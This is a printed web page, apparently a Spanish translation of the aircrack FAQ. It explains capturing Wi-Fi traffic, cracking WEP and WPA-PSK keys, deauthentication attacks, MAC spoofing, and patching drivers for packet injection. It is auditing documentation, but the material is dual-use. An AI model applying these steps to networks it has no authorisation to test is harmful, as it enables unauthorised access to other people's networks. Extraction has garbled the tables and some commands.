Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

Biblia de seguridad para redes inalmbricas

Menu Web Home Foro Productos ONLINE Hardware y equipos Materiales Bricolaje S.O. Linux Software Drivers Tutoriales Herramientas

Trabajo original en ingles realizado por: C. Devine Traduccin realizada del ingles al espaol por: ShaKarO

Aadidos, correcciones y modificaciones realizadas por Hwagm Enlaces reales (Actualizado a 3-10-2006). Descargas correctas tanto en link como shell va wget en entorno linux.
Con la live WIFISLAX (encontrareis todos los ltimos drivers incluidos los de inyeccin ya de serie para rt73, rt61 y ipw2200.

Documentacin en espaol de la suite mas completa para el anlisis de la seguridad wireless

Qu es aircrack ? aircrack es una coleccin de herramientas para la auditora de redes inalmbricas: programa para la captura de paquetes 802.11 programa para la inyeccin de paquetes 802.11 recuperador de claves estticas WEP y WPA-PSK desencripta archivos de capturas WEP/WPA Hay un foro de discusin? Claro y adems muchos mas contenidos: Pincha aqu. Dnde puedo descargar aircrack ? Windows: hwagm.elhacker.net/windows.htm Linux: hwagm.elhacker.net/linux2.htm Recibo el mensaje "cygwin1.dll not found" cuando inicio aircrack.exe. Puedes descargar esta librera de: hwagm.elhacker.net/windows.htm Para usar aircrack, arrastra el/los archivo(s) de captura .cap o .ivs sobre aircrack.exe. Si quieres pasarle opciones al programa debers abrir una consola de comandos (cmd.exe) e introducirlas manualmente; tambin hay una GUI para aircrack, desarrollada por hexanium. C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap Ms abajo encontrars una lista de opciones. Cmo se recupera una clave WEP esttica ? La idea bsica es capturar tanto trfico encriptado como sea posible usando airodump. Cada packete de datos WEP tiene asociado un Vector de Inicializacin (IV) de 3-bytes: despus de recoger un nmero suficiente de paquetes de datos, ejecuta aircrack sobre el archivo de captura resultante. Entonces aircrack ejecutar un conjunto de ataques de tipo estadstico desarrollados por un talentoso hacker llamado KoreK. Cmo s si mi clave WEP es la correcta ? Hay dos modos de autenticacin WEP: Open-System Authentication: Este es el predeterminadoEl AP acepta todos los clientes, y nunca comprueba la clave: siempre concede la asociacin . De todas formas, si tu clave es incorrecta no podrs recibir o enviar paquetes (porque fallar la desencriptacin), y pot tanto DHCP, ping, etc. acabarn interrumpindose. Shared-Key Authentication: el cliente debe encriptar la peticin antes de que le sea concedida la asociacin por el AP. Este modo tiene fallas y provoca la recuperacin de la clave, por lo que nunca est activado de modo predeterminado. En resumen, slo por que parezca que te conectas de forma satisfactoria al AP no significa que tu clave WEP sea la correcta! Para comprobar tu clave WEP, procura desencriptar un archivo de captura con el programa airdecap. Cuntos IVs se necesitan para recuperar claves WEP ? La recuperacin de claves WEP no es una ciencia exacta. El nmero de IVs necesarios depende de la longitud de la clave WEP, y tambin de la suerte. Normalmente, una clave WEP de 40-bit puede ser recuperada con 300.000 IVs, y una de 104-bit con 1.000.000 de IVs; teniendo mala suerte se pueden necesitar dos millones de IVs, o ms. No hay ninguna manera de saber la longitud de la clave WEP: esta informacin est oculta y nunca es anunciada, guardada bien en packetes de gestin, bien en paquetes de datos; como consecuencia, airodump no puede reportar la longitud de la clave WEP. Por ese motivo, se recomienda ejecutar aircrack dos veces: cuando tienes 250.000 IVs, inicias aircrack con "-n 64" para recuperar la WEP de 40-bit. Si no la sacas, vuelves a iniciar aircrack (sin la opcin -n) para recuperar la WEP de 104-bit. Parece que no consigo IVs ! Posibles motivos: Te encuentras demasiado lejos del punto de acceso. No hay trfico en la red escogida. Hay trfico de tipo G pero ests capturando en modo B.

1 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

Hay algn problema con tu tarjeta (problema de firmware ?) Los beacons slo son "paquetes anuncio" sin encriptar. No sirven para la recuperacin de claves WEP. No he podido recuperar la clave de este punto de acceso (AP) ! Shit happens. Por qu no hay una versin de aireplay para Windows ? El controlador PEEK no soporta la inyeccin de paquetes 802.11; No portable aireplay a Win32. De todos modos, hay alternativas comerciales: Tarjetas Atheros: http://www.tamos.com/htmlhelp/commwifi/pgen.htm Targetas Ralink Rt2500; en fase de estudio. Es compatible mi tarjeta con airodump / aireplay ? Antes de nada, busca en Google para averiguar cul es el chipset de tu tarjeta. Por ejemplo, si tienes una Linksys WPC54G busca por "wpc54g chipset linux".

Chipset

Soportado por airodump en Windows ? S (Controlador Agere)

Soportado por airodump en Linux ? S (Controlador orinoco parcheado) S (controlador HostAP o wlan-ng ), firmware STA 1.5.6 o ms nuevo necesario FullMAC: S (controlador prism54) SoftMAC: AN NO (prism54usb) S (PCI y CardBus slo, controlador madwifi) S (rtl8180-sa2400 controlador) S (controlador airo, se recomienda la versin 4.25.30 del firmware) S (controlador rt2500 / rt2570) PARCIAL: el controlador ipw2100 no descarta los paquetes corruptos S (controlador ipw2200, se recomienda la versin 1.0.6) Si (controlador bcm43xxwifislax)

Soportado por aireplay en Linux ? NO (el firmware corrompe la cabecera de la MAC) S (PCI y CardBus slo, se recomienda parchear el controlador) S (se recomienda parchear el controlador) S (es necesario parchear el controlador) INESTABLE (es necesario parchear el controlador) NO (problemas de firmware) S (es necesario parchear el controlador) NO

HermesI

Prism2/3

NO

PrismGT

S (Controlador PrismGT) Controlador Atheros, (ojo con las nuevas) S (controlador Realtek) S? (controlador Cisco)

Atheros

RTL8180

Aironet

Ralink

NO

Centrino b

NO.

Centrino b/g

NO.Pero hay alternativas Slo los modelos antiguos (Controlador BRCM) NO NO NO

Si pero con la nueva suite

Broadcom

SI

TI (ACX100 / ACX111) ZyDAS 1201 Atmel, Marvel

ALFA (controlador acx100) AN NO (Controlador zd1211) DESCONOCIDO

NO NO NO

Con la live WIFISLAX (encontrareis todos los ltimos drivers incluidos los de inyeccin ya de serie para rt73, rt61, ipw2200 y mdulos para las broadcom. El controlador PEEK no reconoce mi tarjeta. Los controladores de Windows arriba mencionados no reconocen algunas tarjetas, incluso teniendo el chipset correcto. En este caso, abre el administrador de dispositivos, selecciona tu tarjeta, "Actualizar el controlador", selecciona "Instalar desde una ubicacin conocida", selecciona "No buscar, seleccionar el controlador a instalar", haz click en "Utilizar disco", introduce la ruta donde ha sido descomprimido el archivo, deselecciona "Mostrar hardware compatible", y elige el controlador. Tengo una tarjeta Prism2, pero airodump / aireplay parece no funcionar ! Primer paso, asegrate de que no ests usando el controlador orinoco. Si el nombre de interfaz es wlan0, entonces el controlador es HostAP o wlan-ng. Si el nombre de la interfaz es eth0 o eth1, entonces el controlador es orinoco y debes deshabilitarlo (usa cardctl para averiguar el identificador de tu tarjeta, entonces edita /etc/pcmcia/config, reemplaza orinoco_cs por hostap_cs y reinicia cardmgr). Tambin puede ser un problema de firmware. Los firmwares antiguos presentan problemas con el test mode 0x0A (usado por los parches para la inyeccin con HostAP / wlan-ng), por tanto asegrate de que el tuyo est al da -- mira las instrucciones ms abajo. La versin recomendada de firmware para la estacin es la 1.7.4. Si no funciona bien (kismet o airodump estallan tras capturar un par de paquetes), prueba con la STA 1.5.6 (o bien s1010506.hex para las tarjetas Prism2 ms antiguas, o

2 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

sf010506.hex para las ms nuevas). Como nota aclaratoria, test mode 0x0A es algo inestable con wlan-ng. Si la tarjeta parece atrancarse, tendrs que resetearla, o usar HostAP en su lugar. La inyeccin sobre dispositivos USB Prism2 est actualmente rota con wlan-ng.

Tengo una tarjeta Atheros, y el parche madwifi provoca un fallo en el kernel / aireplay dice: enhanced RTC support isn't available. Hay algunos problemas con algunas versiones de la rama 2.6 de Linux (especialmente anteriores al 2.6.11) que provocarn un kernel panic al inyectar con madwifi. Tambin, en muchos kernels 2.6 el soporte para RTC mejorado est simplemente roto. Por tanto, est altamente recomendado utilizar un Linux 2.6.11.x o ms nuevo. Cmo actualizo el firmware de mi Prism2 ? La forma ms simple es actualizar mediante WinUpdate - para esto es necesario tener instalado el controlador WPC11 v2.5. Tambin se puede actualizar el firmware con el HostAP parcheado (mira ms abajo las instrucciones sobre cmo parchear e instalar HostAP). Ahora que el HostAP est cargado, puedes comprobar el firmware de tu primario y de la estacin con este comando: # dmesg | grep wifi hostap_cs: Registered netdevice wifi0 wifi0: NIC: id=0x800c v1.0.0 wifi0: PRI: id=0x15 v1.1.1 (primary firmware is 1.1.1) wifi0: STA: id=0x1f v1.7.4 (station firmware is 1.7.4) wifi0: registered netdevice wlan0 Si el id de NIC se encuentra entre 0x8002 y 0x8008, en ese caso tienes una Prism2 antigua y DEBES usar firmware STA en su versin 1.5.6 (s1010506.hex). De lo contrario, deberas usar PRI 1.1.1 / STA 1.7.4 que es la versin de firmware ms estable para las tarjetas Prism2 ms nuevas. NO uses firmware 1.7.1 o 1.8.x, la gente ha reportado problemas usndolos. Para actualizar el firmware, necesitars prism2_srec del paquete hostap-utils; si no se encuentra ya en el sistema, descarga y compila hostap-utils: wget http://hwagm.elhacker.net/descargas/linux/hostap-utils-0.3.7.tar.gz tar -xvzf hostap-utils-0.3.7.tar.gz cd hostap-utils-0.3.7 make Algunas tarjetas Prism2 han sido restringidas a un cierto conjunto de canales debido a regulaciones nacionales.Puedes activar los 14 canales con los siguientes comandos: ./prism2_srec wlan0 -D > pda; cp pda pda.bak Edit pda and put 3FFF at offset 0104 (line 24) Por ltimo, descarga el firmware y flashea tu tarjeta. Si el id de NIC est entre 0x8002 y 0x8008: wget http://hwagm.elhacker.net/descargas/linux3/s1010506.hex ./prism2_srec -v -f wlan0 s1010506.hex -P pda De lo contrario: wget http://hwagm.elhacker.net/descargas/linux3/pk010101.hex wget http://hwagm.elhacker.net/descargas/linux3/sf010704.hex ./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda Si recibes el mensaje " ", el controlador HostAP no est cargado y debes instalarlo. Si recibes el mensaje " ", entonces tu controlador HostAP no ha sido parcheado para soportar la descarga no-voltil. Qu tarjeta comprar ? El mejor chipset a da de hoy es Atheros; est muy bien soportado por ambos Windows y Linux. El ltimo parche madwifi hace posible inyectar en bruto paquetes 802.11 tanto en modo Infraestructura (Managed) como Monitor a velocidades b/g. Ralink hace buenos chipsets, y ha sido muy cooperativo con la comunidad open-source para desarrollar controladores GPL. Ahora la inyeccin de paquetes est completamente soportada bajo Linux con tarjetas PCI/PCMCIA RT2500, y tambin funciona en dispositivos USB RT2570. Aqu hay una lista de tarjetas recomendadas: Card name MSI PC54G2 MSI CB54G2 Type PCI Chipset Ralink Antenna Precio RP-SMA Interna RP-SMA E30 E30 E40 Soporte en Windows No No No Soporte en Linux S S S

CardBus Ralink Ralink

Linksys PCI WMP54G v4 Linksys WUSB54G v4 D-Link DWL-G122 Netgear WG111 USB

Ralink

Interna

E40

No

USB USB

Ralink PrismGT SoftMAC

Interna Interna

E45 E40

No airodump

S No

3 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

Netgear WG311T Netgear WG511T Netgear WAG511 Proxim 8470-WD

PCI

Atheros

RP-SMA Interna Interna MC + Int.

E50 E50 E100 E110

CommView WiFi airodump airodump airodump

S S S S

CardBus Atheros CardBus Atheros CardBus Atheros

Nota: hay algunos modelos ms baratos con nombre parecido (WG511, WG311, DWL-650+ y DWL-G520+); esas tarjetas no estn basadas en Atheros . Adems, el controlador Peek no soporta las tarjetas Atheros recientes, por lo que debers usar CommView WiFi en su lugar. Hemos generado entre todos una lista muy completa de tarjetas para la auditoria wireless, si quieres acceder a ella, pincha: aqu. Cmo uso airodump en Windows ? Antes de nada, asegrate de que tu tarjeta es compatible (mira la tabla de ms arriba) y de que tienes instalado el controlador adecuado. Tambin debes descargar peek.dll y peek5.sys y ponerlos en el mismo directorio que airodump.exe. A la hora de ejecutar airodump, deberas especificar: El nmero identificador de la interfaz de red, que debe ser elegido de la lista mostrada por airodump. El tipo de interfaz de red ('o' para HermesI y Realtek, 'a' para Aironet y Atheros). El nmero de canal, entre 1 y 14. Tambin puedes especificar 0 para altenar entre todos los canales. El prefijo de salida. Por ejemplo, si el prefijo es "foo", entonces airodump crear foo.cap (paquetes capturados) y foo.txt (estadsticas CSV). Si foo.cap existe, airodump continuar la captura aadindole los paquetes. La opcin "slo IVs". Debe ser 1 si slamente quieres guardar los IVs de los paquetes de datos WEP. Esto ahorra espacio, pero el archivo resultante (foo.ivs) slo ser til para la recuperacin de claves WEP. Para parar de capturar paquetes presiona Ctrl-C. Puede que te salga una pantalla azul, debido a un bug en el controlador PEEK por no salir limpiamente de modo monitor. Tambin puede que el archivo resultante de la captura est vaco. La causa de este bug es desconocida. Por qu no puedo compilar airodump y aireplay en BSD / Mac OS X ? Ambas fuentes, de airodump y aireplay son especficas de linux. No hay planes de portarlas a otros sistemas operativos. Cmo uso airodump en Linux ? Antes de ejecutar airodump, debes iniciar el script detectadas. para listar las interfaces inalmbricas

uso: airodump <interfaz o archivo pcap> <prefijo de salida> [canal] [opcin IVs] Especifica 0 como canal para oscilar entre los canales de la banda de los 2.4 GHz. Pasa la opcin de los IVs a 1 para guardar slo los IVs capturados - el archivo resultante slo vale para la recuperacin de claves WEP. Si el demonio gpsd se encuentra funcionando, airodump recoger y guardar las coordenadas GPS en formato de texto. Puedes convertir un archivo .cap / .dump a formato .ivs con el programa pcap2ivs (linux slo). Airodump oscila entre WEP y WPA. Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC invlido). Si es un Centrino b, simplemente no tiene arreglo; ve y compra una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware. Cul es el significado de los campos mostrados por airodump ? airodump mostrar una lista con los puntos de acceso detectados, y tambin una lista de clientes conectados o estaciones ("stations"). Aqu hay un ejemplo de una captura de pantalla usando una tarjeta Prism2 con HostAP:

BSSID 00:13:10:30:24:9C 00:09:5B:1F:44:10 BSSID 00:13:10:30:24:9C 00:13:10:30:24:9C

PWR 46 36

Beacons 15 54

# Data 3416 0 PWR 48 190

CH 6 11

MB

ENC

ESSID the ssid NETGEAR

54. WEP 11 OPN

STATION 00:09:5B:EB:C5:2B 00:02:2D:C1:5D:1F

Packets 719 17

Probes the ssid the ssid

Field BSSID PWR

Description Direccin MAC del punto de acceso. Nivel de seal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estacin la seal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de seal.

4 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

Beacons

Nmero de paquetes-anuncio enviados por el AP. Cada punto de acceso enva unos diez beacons por segundo al ritmo (rate) mnimo (1M), por lo que normalmente pueden ser recogidos desde muy lejos. Nmero de paquetes de datos capturados (si es WEP, slo cuenta IVs), incluyendo paquetes de datos de difusin general. Nmero de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se est alternando entre canales debido a las interferencias de radiofrecuencia. Velocidad mxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b+ y velocidades mayores son 802.11g. Algoritmo de encriptacin en uso. OPN = sin encriptacin, "WEP?" = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP (sin la interrogacin) indica WEP esttica o dinmica, y WPA si TKIP o CCMP estn presentes. Conocida como "SSID", puede estar vaca si el ocultamiento de SSID est activo. En este caso airodump tratar de recuperar el SSID de las respuestas a escaneos y las peticiones de asociacin. Direccin MAC de cada estacin asociada. En la captura de ms arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).

# Data

CH

MB

ENC

ESSID

STATION

Cmo uno dos archivos de captura ? Puedes usar el programa (parte del paquete ethereal-common o la distribucin win32):

Se puede unir archivos .ivs con el programa "mergeivs" (linux slo). Puedo usar Ethereal para capturar paquetes 802.11 ? Bajo Linux, simplemente prepara la tarjeta para modo Monitor con el script Windows, Ethereal NO PUEDE capturar paquetes 802.11 . Puede Ethereal decodificar paquetes de datos WEP ? S. Ve a Editar -> Preferencias -> Protocolos -> IEEE 802.11, selecciona 1 en la "WEP key count" e introduce tu clave WEP debajo. Cmo cambio mi direccin MAC? Esta operacin aparentemente slamente es posible bajo Linux. Por ejemplo, si tienes una tarjeta Atheros: ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up Si no funciona, intenta sacar y re-insertar la tarjeta. Pero hay alternativas en windows; si quieres verlas pincha: aqu Cmo uso aircrack ? Usage: Puedes especificar mltiples archivos de entrada (tanto en formato .cap como .ivs). Tambin puedes ejectutar airodump y aircrack al mismo tiempo: aircrack se auto-actualizar cuando haya nuevos IVs disponibles. Aqu hay un sumario con todas las opciones disponibles: . Bajo

Opcin Param. -a amode

Descripcin Fuerza el tipo de ataque (1 = WEP esttica, 2 = WPA-PSK). Si se especifica, se usarn todos los IVs de las redes con el mismo ESSID. Esta opcin es necesaria en el caso de que el ESSID no est abiertamente difundido en una recuperacin de claves WPA-PSK (ESSID oculto). Selecciona la red elegida basndose en la direccin MAC. En sistemas SMP , especifica con esta opcin el nmero de CPUs. Activa el modo silencioso (no muestra el estado hasta que la clave es o no encontrada). (recuperacin WEP) Limita la bsqueda a caracteres alfanumricos slamente (0x20 - 0x7F). (recuperacin WEP) Especifica el comienzo de la clave WEP (en hex), usado para depuracin. (recuperacin WEP) Direccin MAC para la que filtrar los paquetes de datos WEP. Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, indiferentemente de la red que sea. (recuperacin WEP) Especifica la longitud de la clave: 64 para WEP de 40-bit , 128 para WEP de 104-bit , etc. El valor predeterminado es 128. (recuperacin WEP) Conserva slo los IVs que tienen este ndice de clave (1 a 4). El comportamiento predeterminado es ignorar el ndice de la clave.

-e

essid

-b -p -q -c -d

bssid nbcpu none none start

-m

maddr

-n

nbits

-i

index

5 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

-f

fudge

(recuperacin WEP) De forma predeterminada, este parmetro est establecido en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor ms alto para elevar el nivel de fuerza bruta: la recuperacin de claves llevar ms tiempo, pero con una mayor posibilidad de xito. (recuperacin WEP) Hay 17 ataques de tipo estadstico de korek. A veces un ataque crea un enorme falso positivo que evita que se obtenga la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, ... -k 17 para ir desactivando cada uno de los ataques de forma selectiva. (recuperacin WEP) No aplicar fuerza bruta sobre los dos ltimos keybytes. (recuperacin WEP) ste es un ataque de fuerza bruta experimental nico que debera ser usado cuando el mtodo normal de ataque falle con ms de un milln de IVs. (recuperacin WPA) Ruta hacia la lista de palabras.

-k

korek

-x

none

-y -w

none words

Podras implementar una opcin para reanudar en aircrack ? No hay planes de implementar esta capacidad. Cmo puedo recuperar claves de una red wifi con WPA-PSK ? Debes capturar hasta que se produzca un "saludo" (handshake) entre un cliente inalmbrico y el punto de acceso. Para forzar al cliente a reautenticarse puedes iniciar un ataque de deautenticacin con aireplay. Tambin es necesario un buen diccionario; ver http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/ Para tu informacin. No es posible pre-computar grandes tablas de Pairwise Master Keys como hace rainbowcrack, puesto que la contrasea est entremezclada con el ESSID. Se podrn recuperar claves WPA en el futuro tan fcilmente como las WEP? Es extremadamente improbable que con WPA la recuperacin de claves sea tan fcil del modo que lo ha sido WEP. El mayor problema de WEP es que la clave compartida est adjunta en el IV; el resultado est vinculado directamente con el RC4. Esta construccin simple superpuesta es propensa a un estaque de tipo estadstico, ya que los primeros bytes del texto cifrado estn fuertemente correspondidos con la clave compartida (ver el papel de Andrew Roos). Existen bsicamente dos contramedidas a este ataque: 1. mezclar el IV y la clave compartida usando una funcin para la codificacin o 2. descartar los primeros 256 bytes de la salida del RC4. Ha habido alguna desinformacin en las noticias acerca de las fallas de TKIP: Por ahora, TKIP es razonablemente seguro por s solo viviendo un tiempo prestado ya que se apoya en el mismo algoritmo RC4 en el que se apoy WEP. Realmente, TKIP (WPA1) no es vulnerable: para cada paquete, el IV de 48-bit est mezclado con la clave temporal pairwise de 128-bit para crear una clave RC4 de 104-bit, por lo que no hay ninguna correlacin de tipo estadstico . Es ms, WPA proporciona contramedidas ante ataques activos (reinyeccin de trfico), incluye un mensaje de integridad de cdigo ms fuerte (michael), y tiene un protocolo de autenticacain muy robusto ("saludo" de 4 fases). La nica vulnerabilidad a tener en cuenta es el ataque con diccionario, que falla si la contrasea es lo suficientemente robusta. WPA2 (aka 802.11i) es exactamente lo mismo que WPA1, excepto que usa CCMP (////AES in counter mode////) en lugar de RC4 y HMAC-SHA1 en lugar de HMAC-MD5 para el EAPOL MIC. Como apunte final, WPA2 es un poco mejor que WPA1, pero ninguno de los dos ser posible una recuperacin de claves en un futuro cercano. Tengo ms de un milln de IVs, pero aircrack no encuentra la clave ! Posibles motivos: Mala suerte: necesitas capturar ms IVs. normalmente, una WEP de 104-bit puede ser recuperada con aproximadamente un milln de IVs, aunque a veces se necesitan ms IVs. Si todos los votos (votes) parecen iguales, o si hay muchos votos negativos, entonces el archivo con la captura est corrupto, o la clave no es esttica (se est usando EAP/802.1X ?). Un falso positivo evit que se obtuviera la clave. Prueba a desactivar cada ataque korek (-k 1 .. 17), sube el nivel de fuerza bruta (-f) o prueba con el ataque inverso experimental nico (-y). He encontrado una clave, cmo desencripto un archivo de captura ? Puedes usa el programa :

uso: airdecap [opciones] <archivo pcap> -l -b -k -e -p -w bssid pmk essid pass key : : : : : : no elimina la cabecera del 802.11 filtro de direccin MAC del punto de acceso WPA Pairwise Master Key en hex Identificador en ascii de la red escogida contrasea WPA de la red escogida clave WEP de la red escogida en hex

ejemplos: airdecap -b 00:09:5B:10:BC:5A open-network.cap airdecap -w 11A3E229084349BC25D97E2939 wep.cap airdecap -e "el ssid" -p contrasea tkip.cap Cmo recupero mi clave WEP en Windows ? Puedes usar el programa WZCOOK que recupera las claves WEP de la utilidad de XP Wireless Zero Configuration. ste es un software experimental, por lo que puede que funcione y puede que no,

6 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

dependiendo del nivel de service pack que tengas. Recupera WZCOOK tambin claves WPA ? WZCOOK mostrar el PMK (Pairwise Master Key), un valor de 256-bit que es el resultado de codificar 8192 veces la contrasea junto con el ESSID y la longitud del ESSID. La contrasea en s no se puede recuperar -- de todos modos, basta con conocer el PMK para conectar con una red inalmbrica protegida mediante WPA con wpa_supplicant (ver el Windows README). Tu archivo de configuracin debera quedar as:

Cmo parcheo el controlador para la inyeccin con aireplay ? Hasta ahora, aireplay slo soporta la inyeccin con Prism2, PrismGT (FullMAC), Atheros, RTL8180 y Ralink. La inyeccin con Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell y Broadcom no est soportada debido a limitaciones en firmware y/o controlador. Pero se han solucionado con la nueva suite para las centrino ipw2200b/g. La inyeccin con Prism2 y Atheros es an bastante experimental; si tu tarjeta parece colgarse (sin paquetes capturados o inyectados), desactiva la interfaz, vuelve a cargar los controladores y reinserta la tarjeta. Considera tambin actualizar el firmware (si es Prism2). Todos los controladores deben ser parcheados para de ese modo soportar la inyeccin en modo Monitor. Necesitars las cabeceras linux (linux headers) que coincidan con el kernel que ests usando; si no, tendrs que descargar las funentes de linux y compilar un kernel personalizado.

Instalando el controlador madwifi (Tarjetas Atheros) Nota 1: necesitars uudecode del paquete sharutils. Nota 2: el parche 20051008 debera funcionar tambin con versiones ms recientes del CVS de madwifi. Nota 3: si usas wpa_supplicant, deberas recompilarlo (las verisones antiguas no son compatibles con el CVS actual de madwifi), y asegurarte de que no est comentado en config.h. Nota 4: con el madwifi actual, ya no ser necesario ejecutar " el controlador permite la inyeccin en modo 0 usando la nueva interfaz athXraw. ", ya que

Modos Permitidos Modo 0 Modo 1 Modo 2 Modo 3

Medio Fsico Automtico (a/b/g) 802.11a slo 802.11b slo 802.11g slo

ifconfig ath0 down rmmod wlan_wep ath_rate_sample ath_rate_onoe \ ath_pci wlan ath_hal 2>/dev/null find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/null find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/madwifi-cvs-20051025.tgz wget http://hwagm.elhacker.net/descargas/linux/madwifi-cvs-20051025.patch tar -xvzf madwifi-cvs-20051025.tgz cd madwifi-cvs-20051025 patch -Np1 -i ../madwifi-cvs-20051025.patch make KERNELPATH=/usr/src/linux-<insert version> make install modprobe ath_pci Ahora es posible establecer el ritmo de transmisin (rate) con madwifi (y tambin con rt2570). El valor recomendado es 5.5 Mbps, pero puedes reducirlo o incrementarlo en funcin de la distancia a la que se encuentre el AP. Por ejemplo: iwconfig ath0 rate 24M Modulado Velocidades Permitidas

DSSS / CCK 1M, 2M, 5.5M, 11M OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M Durante los ataques 2, 3 y 4, cambiar el nmero de paquetes por segundo enviados por aireplay (opcin -x) a veces ayuda a obtener mejores resultados; el predeterminado es 500 pps.

Instalacin del controlador prism54 (tarjetas PrismGT FullMAC) ifconfig eth1 down rmmod prism54 cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/prism54-svn-20050724.tgz

7 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

wget http://hwagm.elhacker.net/descargas/linux3/prism54-svn-20050724.patch tar -xvzf prism54-svn-20050724.tgz cd prism54-svn-20050724 patch -Np1 -i ../prism54-svn-20050724.patch make modules && make install wget http://hwagm.elhacker.net/descargas/linux2/1.0.4.3.arm mkdir -p /usr/lib/hotplug/firmware mkdir -p /lib/firmware cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890 mv 1.0.4.3.arm /lib/firmware/isl3890 depmod -a Instalacin del controlador HostAP (tarjetas Prism2) ifconfig wlan0 down wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable /etc/init.d/pcmcia stop rmmod prism2_pci rmmod hostap_pci cd /usr/src wget http://hwagm.elhacker.net/descargas/linux3/hostap-driver-0.4.5.tar.gz wget http://hwagm.elhacker.net/descargas/linux3/hostap-driver-0.3.9.patch tar -xvzf hostap-driver-0.4.5.tar.gz cd hostap-driver-0.4.5 patch -Np1 -i ../hostap-driver-0.3.9.patch make && make install mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~ /etc/init.d/pcmcia start modprobe hostap_pci &>/dev/null Instalacin del controlador wlan-ng (Prism2 cards) Nota importante: al insertar la tarjeta, wlan-ng flashear el firmware en la RAM (descarga voltil) con las versiones PRI 1.1.4 y STA 1.8.3. Muchos usuarios tuvieron problemas con esta operacin, por lo que en ese caso es mejor usar hostap en su lugar. Adems, HostAP funciona de forma ms fiable y soporta iwconfig mientras que wlan-ng no. ifconfig wlan0 down wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable /etc/init.d/pcmcia stop rmmod prism2_pci rmmod hostap_pci find /lib/modules \( -name p80211* -o -name prism2* \) \ -exec rm -v {} \; cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/wlanng-0.2.1-pre26.tar.gz wget http://hwagm.elhacker.net/descargas/linux/wlanng-0.2.1-pre26.patch tar -xvzf wlanng-0.2.1-pre26.tar.gz cd wlanng-0.2.1-pre26 patch -Np1 -i ../wlanng-0.2.1-pre26.patch make config && make all && make install mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~ /etc/init.d/pcmcia start modprobe prism2_pci &>/dev/null Instalacin del controlador r8180-sa2400 (tarjetas RTL8180) ifconfig wlan0 down rmmod r8180 cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/rtl8180-0.21.tar.gz wget http://hwagm.elhacker.net/descargas/linux/rtl8180-0.21.patch tar -xvzf rtl8180-0.21.tar.gz cd rtl8180-0.21 patch -Np1 -i ../rtl8180-0.21.patch make && make install depmod -a modprobe r8180 Instalacin del controlador rt2500 (Ralink b/g PCI/PCMCIA) ifconfig ra0 down rmmod rt2500 cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/rt2500-cvs-20051112.tgz tar -xvzf rt2500-cvs-20051112.tgz cd rt2500-cvs-20051112 cd Module make && make install modprobe rt2500 Asegrate de cargar el controlador con modprobe (no insmod) y de poner la tarjeta en modo Monitor antes de levantar la interfaz.

Instalacin del controlador rt2570 (Ralink b/g USB) ifconfig rausb0 down rmmod rt2570 cd /usr/src wget http://hwagm.elhacker.net/descargas/linux/rt2570-cvs-20051112.tgz tar -xvzf rt2570-cvs-20051112.tgz cd rt2570-cvs-20051112 cd Module make && make install modprobe rt2570 El controlador no compila.

8 de 11

27/06/2009 11:03

Documentacin castellano suite mas completa seguridad wifi, enlaces y...

http://hwagm.elhacker.net/htm/traduccion.htm

